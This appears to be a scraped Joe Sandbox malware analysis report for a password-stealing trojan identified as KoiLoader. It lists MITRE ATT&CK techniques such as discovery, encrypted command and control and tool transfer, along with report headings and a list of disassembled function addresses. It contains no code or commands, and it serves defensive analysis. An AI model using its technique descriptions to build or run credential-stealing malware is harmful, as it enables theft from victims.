Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: KoiLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Windows Analysis Report
SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Function 00BD89F0 Relevance: 210.7, APIs: 77, Strings: 43, Instructions: 654
libraryloaderCOMMON

Function 00D11300 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 301
librarymemoryloaderCOMMON

Function 00BD9240 Relevance: 3.0, APIs: 2, Instructions: 49
COMMON

Function 00D11710 Relevance: 1.6, APIs: 1, Instructions: 105
COMMON

Function 00D13C60 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42
timeCOMMON

Function 00BD5FD0 Relevance: 68.6, APIs: 30, Strings: 9, Instructions: 309
libraryfileloaderCOMMON

Function 00BD6830 Relevance: 52.7, APIs: 27, Strings: 3, Instructions: 229
memorynetworkfileCOMMON

Function 00BD7920 Relevance: 51.0, APIs: 26, Strings: 3, Instructions: 265
memoryCOMMON

Function 00BD94A0 Relevance: 49.2, APIs: 21, Strings: 7, Instructions: 192
libraryloadermemoryCOMMON

Function 00BD72E0 Relevance: 49.2, APIs: 19, Strings: 9, Instructions: 154
stringCOMMON

Function 00BD5C70 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 277
injectionthreadprocessCOMMON

Function 00BD86E6 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 175
sleepencryptionfileCOMMON